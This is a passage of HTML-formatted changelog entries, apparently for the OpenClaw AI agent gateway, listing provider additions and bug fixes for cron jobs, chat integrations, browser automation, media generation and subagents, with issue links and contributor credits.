<li>Providers/OpenCode Go: add DeepSeek V4 Pro and DeepSeek V4 Flash to the Go catalog while the bundled Pi registry catches up. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328161792" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71587" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71587/hovercard" href="https://github.com/openclaw/openclaw/issues/71587">#71587</a>.</li>
<li>Providers/OpenCode Go: route DeepSeek V4 Pro/Flash through the OpenAI-compatible Go endpoint and suppress invalid <code>reasoning_effort: "off"</code> payloads, fixing tool-enabled requests for <code>opencode-go/deepseek-v4-flash</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328769808" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71683" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71683/hovercard" href="https://github.com/openclaw/openclaw/issues/71683">#71683</a>.</li>
<li>Plugins/model defaults: run Skill Workshop review, Active Memory recall, and session-memory slug generation on the configured agent default model instead of the hardcoded OpenAI SDK fallback when hook context lacks model metadata. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328679241" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71659" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71659/hovercard" href="https://github.com/openclaw/openclaw/issues/71659">#71659</a>.</li>
<li>Providers/Venice: fill the required DeepSeek V4 <code>reasoning_content</code> placeholder for <code>venice/deepseek-v4-pro</code> and <code>venice/deepseek-v4-flash</code> replay turns without sending native DeepSeek <code>thinking</code> controls that Venice rejects. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328450187" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71628" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71628/hovercard" href="https://github.com/openclaw/openclaw/issues/71628">#71628</a>.</li>
<li>Browser/existing-session: support per-profile Chrome MCP command/args, map <code>cdpUrl</code> to <code>--browserUrl</code> or <code>--wsEndpoint</code>, and avoid combining endpoint flags with <code>--userDataDir</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4080120284" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47879" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47879/hovercard" href="https://github.com/openclaw/openclaw/issues/47879">#47879</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4080995803" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48037" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48037/hovercard" href="https://github.com/openclaw/openclaw/issues/48037">#48037</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4220547110" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62706" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62706/hovercard" href="https://github.com/openclaw/openclaw/issues/62706">#62706</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/puneet1409/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/puneet1409">@puneet1409</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhehao/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhehao">@zhehao</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/madkow1001/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/madkow1001">@madkow1001</a>.</li>
<li>Media/plugins: bound MIME sniffing and ZIP archive preflight before handing untrusted files to <code>file-type</code> or <code>jszip</code>, reducing parser CPU and memory exposure for attachments and ClawHub plugin archives. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Memory-host SDK: use trusted env-proxy mode for remote embedding and batch HTTP calls only when Undici will proxy that target, preserving SSRF DNS pinning for <code>ALL_PROXY</code>-only and <code>NO_PROXY</code> bypass cases. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115438877" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52162" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52162/hovercard" href="https://github.com/openclaw/openclaw/issues/52162">#52162</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327688904" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71506" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71506/hovercard" href="https://github.com/openclaw/openclaw/pull/71506">#71506</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DhtIsCoding/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DhtIsCoding">@DhtIsCoding</a>.</li>
<li>Gateway/dashboard: render Control UI and WebSocket links with <code>https://</code>/<code>wss://</code> when <code>gateway.tls.enabled=true</code>, including <code>openclaw gateway status</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327630185" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71494" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71494/hovercard" href="https://github.com/openclaw/openclaw/issues/71494">#71494</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327660439" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71499" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71499/hovercard" href="https://github.com/openclaw/openclaw/pull/71499">#71499</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/deepkilo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/deepkilo">@deepkilo</a>.</li>
<li>Agents/OpenAI-compatible: default proxy/local completions tool requests to <code>tool_choice: "auto"</code> when tools are present, so providers enter native tool-calling mode instead of replying with plain-text tool directives. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327534098" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71472" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71472/hovercard" href="https://github.com/openclaw/openclaw/pull/71472">#71472</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Speed-maker/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Speed-maker">@Speed-maker</a>.</li>
<li>OpenAI image generation: use <code>gpt-5.5</code> for the Codex OAuth responses transport instead of the retired <code>gpt-5.4</code> model, fixing 500s from ChatGPT Codex image generation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327703791" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71513" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71513/hovercard" href="https://github.com/openclaw/openclaw/issues/71513">#71513</a>. Thanks @baolongl.</li>
<li>OpenAI image generation: route transparent-background default-model requests to <code>gpt-image-1.5</code>, document the expected <code>image_generate</code> call shape, and keep Azure/custom OpenAI-compatible deployment names untouched.</li>
<li>Google video generation: download direct MLDev Veo <code>video.uri</code> results instead of passing them through the Files API path, fixing 404s after successful generation/polling. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324817492" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71200" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71200/hovercard" href="https://github.com/openclaw/openclaw/issues/71200">#71200</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/panhaishan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/panhaishan">@panhaishan</a>.</li>
<li>Google video generation: fall back to the REST <code>predictLongRunning</code> Veo endpoint for text-only SDK 404s while keeping reference image/video generation on the SDK path. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4215587624" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62309/hovercard" href="https://github.com/openclaw/openclaw/issues/62309">#62309</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4222914272" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63008" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63008/hovercard" href="https://github.com/openclaw/openclaw/issues/63008">#63008</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4216005545" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62343" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62343/hovercard" href="https://github.com/openclaw/openclaw/pull/62343">#62343</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leoleedev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leoleedev">@leoleedev</a>.</li>
<li>MiniMax music generation: switch the bundled default model from the unsupported <code>music-2.5+</code> id to the current <code>music-2.6</code> API model. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245010440" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64870" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64870/hovercard" href="https://github.com/openclaw/openclaw/issues/64870">#64870</a> and addresses the music default from <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4215652478" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62315" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62315/hovercard" href="https://github.com/openclaw/openclaw/issues/62315">#62315</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/noahclanman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/noahclanman">@noahclanman</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/edwardzheng1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/edwardzheng1">@edwardzheng1</a>.</li>
<li>Cron: record jobs interrupted by a gateway restart as failed at their original <code>runningAtMs</code>, skip unsafe startup replay, and disable interrupted one-shot jobs so they show a visible failure instead of silently disappearing or duplicating work. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4187207893" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59056" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59056/hovercard" href="https://github.com/openclaw/openclaw/issues/59056">#59056</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207476732" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61343" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61343/hovercard" href="https://github.com/openclaw/openclaw/issues/61343">#61343</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231039858" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63657" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63657/hovercard" href="https://github.com/openclaw/openclaw/issues/63657">#63657</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4190617901" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59301" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59301/hovercard" href="https://github.com/openclaw/openclaw/issues/59301">#59301</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ponchoooPenguin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ponchoooPenguin">@ponchoooPenguin</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/daemic24/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/daemic24">@daemic24</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/myradon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/myradon">@myradon</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hikiwibot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hikiwibot">@hikiwibot</a>.</li>
<li>Cron tool: recover flat top-level schedule shorthand such as <code>cron</code>, <code>tz</code>, and <code>staggerMs</code> before gateway validation, so model-generated cron add/update calls preserve cron jitter settings. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tyxben/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tyxben">@tyxben</a>.</li>
<li>Cron: hydrate flat legacy job rows with top-level <code>cron</code>, <code>tz</code>, <code>session</code>, and <code>message</code> fields into canonical schedule, target, and payload objects before startup recomputes run times. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4059364525" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43351" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/43351/hovercard" href="https://github.com/openclaw/openclaw/issues/43351">#43351</a>.</li>
<li>Agents/replies: let pending group chat history trigger bare mentioned turns without treating metadata-only inbound context as user input. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327616390" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71489" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71489/hovercard" href="https://github.com/openclaw/openclaw/issues/71489">#71489</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327739393" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71520" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71520/hovercard" href="https://github.com/openclaw/openclaw/pull/71520">#71520</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</li>
<li>Google media generation: strip a configured trailing <code>/v1beta</code> from Google music/video provider base URLs before calling the Google GenAI SDK, preventing doubled <code>/v1beta/v1beta</code> paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226005033" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63240" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63240/hovercard" href="https://github.com/openclaw/openclaw/issues/63240">#63240</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226196460" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63258" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63258/hovercard" href="https://github.com/openclaw/openclaw/pull/63258">#63258</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Hybirdss/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Hybirdss">@Hybirdss</a>.</li>
<li>Discord: restore direct-message voice-note preflight transcription and classify URL-only Ogg/Opus voice attachments as audio while skipping partial attachments without usable URLs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207287932" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61314" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61314/hovercard" href="https://github.com/openclaw/openclaw/issues/61314">#61314</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4244552483" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64803" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64803/hovercard" href="https://github.com/openclaw/openclaw/issues/64803">#64803</a>.</li>
<li>Plugins/build: copy bundled plugin skill trees into <code>dist-runtime</code>, broaden Windows symlink-copy fallbacks, and fingerprint runtime dependencies from <code>lstat</code> so symlink-like directory entries cannot crash staging.</li>
<li>Google Chat: preserve reply text when a typing indicator message is deleted or can no longer be updated, so media captions and first text chunks are resent instead of silently disappearing. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327650702" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71498" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71498/hovercard" href="https://github.com/openclaw/openclaw/pull/71498">#71498</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/colin-lgtm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/colin-lgtm">@colin-lgtm</a>.</li>
<li>Cron: tolerate malformed legacy job rows in startup, main-session system-event payloads, and human-readable <code>cron list</code> output so missing <code>state</code>, <code>payload.text</code>, or display fields no longer crash the scheduler or CLI. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4256052544" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66016" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66016/hovercard" href="https://github.com/openclaw/openclaw/issues/66016">#66016</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4254208406" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65916" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65916/hovercard" href="https://github.com/openclaw/openclaw/issues/65916">#65916</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4237081136" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64137" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64137/hovercard" href="https://github.com/openclaw/openclaw/issues/64137">#64137</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4173024002" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57872" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/57872/hovercard" href="https://github.com/openclaw/openclaw/issues/57872">#57872</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4197639692" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59968" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59968/hovercard" href="https://github.com/openclaw/openclaw/issues/59968">#59968</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4233361564" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63813" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63813/hovercard" href="https://github.com/openclaw/openclaw/issues/63813">#63813</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4120171658" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52804" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52804/hovercard" href="https://github.com/openclaw/openclaw/issues/52804">#52804</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4057886163" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43163" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/43163/hovercard" href="https://github.com/openclaw/openclaw/issues/43163">#43163</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327695420" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71509" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71509/hovercard" href="https://github.com/openclaw/openclaw/pull/71509">#71509</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/models: make <code>openclaw models scan</code> fall back to public OpenRouter free-model metadata when no <code>OPENROUTER_API_KEY</code> is configured, avoid config secret resolution for explicit <code>--no-probe</code> scans, and apply the scan timeout to the OpenRouter catalog request.</li>
<li>Feishu: keep streaming cards to one live card per turn, flush throttled card edits after meaningful text boundaries, and skip exact block/partial repeats so tool-heavy replies do not duplicate card output. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/allan0509/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/allan0509">@allan0509</a>.</li>
<li>Feishu: finish the streaming-card duplicate closeout by stripping leaked reasoning tags, preserving cross-block partial snapshots, enabling topic-thread streaming cards, omitting the generic <code>main</code> card header, surfacing transient tool/compaction status, and cleaning streaming state after close failures. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sesame437/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sesame437">@sesame437</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Vicky-v7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Vicky-v7">@Vicky-v7</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maoku-family/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maoku-family">@maoku-family</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Pengxiao-Wang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Pengxiao-Wang">@Pengxiao-Wang</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Maple778/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Maple778">@Maple778</a>.</li>
<li>Telegram: recover incomplete partial-stream previews by falling back to a final send when an ambiguous final edit failure would otherwise retain a strict prefix of the answer. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327777647" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71525" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71525/hovercard" href="https://github.com/openclaw/openclaw/issues/71525">#71525</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327970972" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71554" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71554/hovercard" href="https://github.com/openclaw/openclaw/pull/71554">#71554</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sahilsatralkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sahilsatralkar">@sahilsatralkar</a>.</li>
<li>Control UI/chat: collapse assistant token/model context details behind an explicit Context disclosure and show full dates in message footers, making historical transcript timing clear without noisy default metadata. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326580782" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71337" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71337/hovercard" href="https://github.com/openclaw/openclaw/pull/71337">#71337</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>OpenAI/Codex OAuth: explain <code>unsupported_country_region_territory</code> token-exchange failures with a proxy/region hint instead of surfacing a generic OAuth error. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4109246729" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51175" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51175/hovercard" href="https://github.com/openclaw/openclaw/issues/51175">#51175</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327668763" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71501" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71501/hovercard" href="https://github.com/openclaw/openclaw/pull/71501">#71501</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wulala-xjj/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wulala-xjj">@wulala-xjj</a>.</li>
<li>Browser/Linux: fall back to headless mode for local managed profiles on hosts without a display server, while preserving explicit per-profile headed overrides and reporting the headless source. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4205308957" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60953" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60953/hovercard" href="https://github.com/openclaw/openclaw/pull/60953">#60953</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rrpsantos/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rrpsantos">@rrpsantos</a>.</li>
<li>Telegram: remove the startup persisted-offset <code>getUpdates</code> preflight so polling restarts do not self-conflict before the runner starts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4295160026" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69304" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69304/hovercard" href="https://github.com/openclaw/openclaw/issues/69304">#69304</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4303812517" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69779" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69779/hovercard" href="https://github.com/openclaw/openclaw/pull/69779">#69779</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chinar-amrutkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chinar-amrutkar">@chinar-amrutkar</a>.</li>
<li>Telegram: keep the polling stall watchdog active even when grammY reports the runner as not running while its task is still pending, so a rebuilt transport cannot leave <code>getUpdates</code> silent until a manual gateway restart. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291652137" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69064" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69064/hovercard" href="https://github.com/openclaw/openclaw/issues/69064">#69064</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LDLoeb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LDLoeb">@LDLoeb</a>.</li>
<li>Subagents: fall back to direct completion delivery when the parent announce turn finishes without a visible payload, so child results still reach channel-backed requester sessions.</li>
<li>Subagents: tell parent agents to use <code>sessions_yield</code> while waiting for child completion events, preventing GPT-5 fast runs from ending silently after spawning workers.</li>
<li>Browser/Playwright: ignore benign already-handled route races during guarded navigation so browser-page tasks no longer fail when Playwright tears down a route mid-flight. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289338446" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68708" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68708/hovercard" href="https://github.com/openclaw/openclaw/pull/68708">#68708</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Steady-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Steady-ai">@Steady-ai</a>.</li>
<li>Browser/CLI: lazy-load browser command groups and plugin runtime services so <code>openclaw browser --help</code> can render without loading the full browser automation stack. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4248388921" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65400" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65400/hovercard" href="https://github.com/openclaw/openclaw/issues/65400">#65400</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4248899051" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65460" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65460/hovercard" href="https://github.com/openclaw/openclaw/pull/65460">#65460</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4263144074" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66640" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66640/hovercard" href="https://github.com/openclaw/openclaw/pull/66640">#66640</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pandego/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pandego">@pandego</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Tianworld/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Tianworld">@Tianworld</a>.</li>
<li>Browser/CLI: serve precomputed <code>openclaw browser --help</code> text from CLI startup metadata, avoiding the full plugin/config startup path for the common help invocation.</li>
